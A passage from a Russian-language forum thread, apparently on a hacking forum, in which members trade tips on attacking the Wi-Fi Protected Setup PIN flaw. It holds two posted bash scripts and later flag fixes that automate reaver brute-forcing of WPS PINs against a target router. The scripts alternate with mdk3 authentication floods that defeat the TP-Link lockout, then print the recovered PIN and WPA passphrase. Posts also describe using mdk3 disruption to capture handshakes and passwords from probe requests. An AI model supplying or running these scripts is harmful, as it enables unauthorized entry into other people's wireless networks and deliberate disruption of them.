Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    та просто таким образом можно было бы исключить блокировку wps при переборе,т.е роутер не смог бы что либо заподозрить,если не отправлять пакет М4 и тем самым не будет лока wps(но это в теории)
     
  2. ORi0N

    ORi0N Member

    Joined:
    4 Mar 2016
    Messages:
    18
    Likes Received:
    73
    Reputations:
    1
    Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость
     
    quite gray likes this.
  3. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    1,061
    Likes Received:
    5,203
    Reputations:
    63
    После MDK3 не такая уже и редкость.
    Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.
     
  4. ORi0N

    ORi0N Member

    Joined:
    4 Mar 2016
    Messages:
    18
    Likes Received:
    73
    Reputations:
    1
    Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... :D Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...
     
  5. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    так а как понять,что это именно пароли?а пин кода wps там не попадается?:)
     
  6. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    mdk3 с какими именно параметрами?там же опций много....mdk3 на деаут клиентов что ли?
     
  7. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    та если бы не хендшейки летели,а пароли в открытом виде или пины wps,то цены не было бы:)
     
  8. 2serg2

    2serg2 New Member

    Joined:
    21 Aug 2007
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.
     
  9. Alexmeh

    Alexmeh Elder - Старейшина

    Joined:
    19 Nov 2015
    Messages:
    2,344
    Likes Received:
    20,037
    Reputations:
    96
    Зайти в админку роутера и включить WPS
    http://www.tp-linkru.com/faq-87.html
    Руководство:
    http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf
    ПУНКТ 4.4 WPS
    И учитесь пользоваться поиском!
     
    #3769 Alexmeh, 14 Jan 2017
    Last edited: 14 Jan 2017
    VladimirV likes this.
  10. 2serg2

    2serg2 New Member

    Joined:
    21 Aug 2007
    Messages:
    24
    Likes Received:
    1
    Reputations:
    0
    Снял галочку напротив Отключить PIN-код маршрутизатора и WPS заработал. Выходит, после атаки автоматически включается эта настройка.
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Точнее, после нескольких неверных попыток, да.
     
    quite gray likes this.
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Лучше всего кувалдой, но если таковой не имеется, и монтировка сойдёт.

    И предвещая негодование от моего ответа, подскажу, что эти предоставленные названия ничего не говорят, нужно больше данных.
     
    Algierd and VladimirV like this.
  13. DSL2650NRU

    DSL2650NRU Well-Known Member

    Joined:
    12 Apr 2016
    Messages:
    467
    Likes Received:
    306
    Reputations:
    1
    Ривер с пикси. Также у длинков очень часто используют статичный или легко вычисляемый пароль.
     
  14. qwertys76

    qwertys76 Member

    Joined:
    18 Apr 2016
    Messages:
    88
    Likes Received:
    26
    Reputations:
    0
    напишите названия моделей этих роутеров. больше будет вариантов подсказок
     
  15. ensto

    ensto Member

    Joined:
    5 Jun 2015
    Messages:
    61
    Likes Received:
    11
    Reputations:
    0
    Использую скрипт от VladimirV.
    Есть проблема, reaver не останавливается после десятой попытки (ключ -g 10), а продолжает пытаться подбирать пин дальше:
    [+] p1_index set to 160
    [+] Pin count advanced: 160. Max pin attempts: 10
    [+] 2000.00% complete. Elapsed time: 0d0h2m6s.
    [+] Estimated Remaining time: 0d0h2m6s

    Из-за этого не может запуститься mdk3.
    Кто с таким сталкивался, как это победить?
     
  16. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    У меня тоже не работает, связано с версией reaver. Сейчас поищу, я вроде переписывал скрипт по времени, а не по количеству попыток.
    Code:
    #!/bin/bash
    while true;
    # Run reaver to work 10 pin
    echo
    echo
    echo [+] reaver is working ...
    do
    gnome-terminal --title='reaver' -e "reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -s /etc/reaver/10FEED5AXXXX.wpc";
    sleep 60;
    killall reaver;
    
    # Run mdk3 to work 3s
    echo
    echo
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
    sleep 3;
    killall mdk3 2> /dev/null;
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
    sleep 14;
    done;
    как-то так.
     
    #3776 VladimirV, 16 Jan 2017
    Last edited: 18 Jan 2017
    Triton_Mgn and farkos like this.
  17. ensto

    ensto Member

    Joined:
    5 Jun 2015
    Messages:
    61
    Likes Received:
    11
    Reputations:
    0
    Спасибо, VladimirV за помощь. Было пару трудностей. Может кому-то понадобиться.
    • killall -s INT -w reaver - добавил эти два ключа, иначе буксует на месте, не сохраняет последний пин перед закрытием reaver.
    • reaver -a - ключ убирает запрос: продолжить предыдущую сессию.
    • "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX -m"; -m без этого ключа у меня, TP-Link не сбрасывал счетчик 10 неудачных попыток.
     
    USER_X, farkos and VladimirV like this.
  18. grek-6630

    grek-6630 New Member

    Joined:
    16 Feb 2016
    Messages:
    36
    Likes Received:
    3
    Reputations:
    0
    Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?
     
    quite gray likes this.
  19. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Нашел переделанный скрипт, проверю, выложу.
     
  20. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Сам скрипт - http://rgho.st/6fbpBdPRn
    Для быстрой и удачной работы нужен хороший сигнал.
    В качестве параметра передается BSSID (12:34:56:78:90:AB) TpLink.sh 12:34:56:78:90:AB
    Принцип работы:
    1: Запускает reaver
    2: Ждет ассоциации с точкой
    3: Брутит пины 40 сек
    4: Запуск Mdk3 на 6 сек
    5 :Пауза 5 сек
    6: Если пин не найден - повторяет с 1 по 6
    7: Выводит пин и пас и ждет нажатия 'Ctrl+C'

    Все файлы сохраняются в папке 'tmp' с файлом скрипта.BSSID в имени файла.
    Code:
    #!/bin/bash
    
    BSSID=$1
    WPSPIN=""
    WPAPSK=""
    Work_reaver=20                #Время работы reaver * 2
    tmp_path=`dirname $0`/tmp/$BSSID
    echo $tmp_path
    echo "BSSID = $BSSID"
    if [ "$1" == "" ]
        then
        echo "No BSSID"
        exit 1
        fi
    #echo "" > "$tmp_path.txt"
    
    
    trap 'echo "Wait exit reaver"; kill_reaver; exit 1' 2
    
    kill_reaver (){
    killall -s INT -w reaver;
    }
    
    run_MDK3 (){
    echo [+] Mdk3 is working ...
    gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a $BSSID -m"
    sleep 6                            #Время работы Mdk3
    killall mdk3 2> /dev/null
    echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]
    sleep 5
    }
    
    wait_associated (){
    Ass=""
    while [ "$Ass" == "" ]
    do
    sleep 2
    Ass=`grep "Associated with" "$tmp_path.txt"`
      if [ "$Ass" == "" ]
      then echo [-] not associated
      else echo $Ass
      fi
    done
    
    }
    
    while [ "$WPSPIN" == "" ]
    do
    echo [+] reaver is working ...
    echo "" > $tmp_path.txt
    reaver -i mon0 -b $BSSID -n -v -L -s "$tmp_path.wpc" > "$tmp_path.txt" &
    ReaverID=$!
    disown $ReaverID
    
    wait_associated
    
    for (( counter=1; counter<$Work_reaver; counter++ ))
        do
         sleep 2
        if [ "$WPSPIN" == "" ]
            then
         WPSPIN=`grep "WPS PIN" "$tmp_path.txt"`
         WPAPSK=`grep "WPA PSK" "$tmp_path.txt"`
        else break
        fi
        done
    
    TRYPIN=`grep "Trying pin" "$tmp_path.txt" | grep -oE "[[:digit:]]{8}"`
    
    echo "Pins"
    echo "$TRYPIN"
    
    kill_reaver
    
    # Run mdk3 to work ...
    if [ "$WPSPIN" == "" ]
    then run_MDK3
    fi
    done
    
    echo "[+] Done..."
    echo "$WPSPIN"
    echo "$WPAPSK"
    echo to interrupt script [Ctrl+C]
    while true
    do
    sleep 3
    done 
     
    #3780 VladimirV, 18 Jan 2017
    Last edited: 18 Jan 2017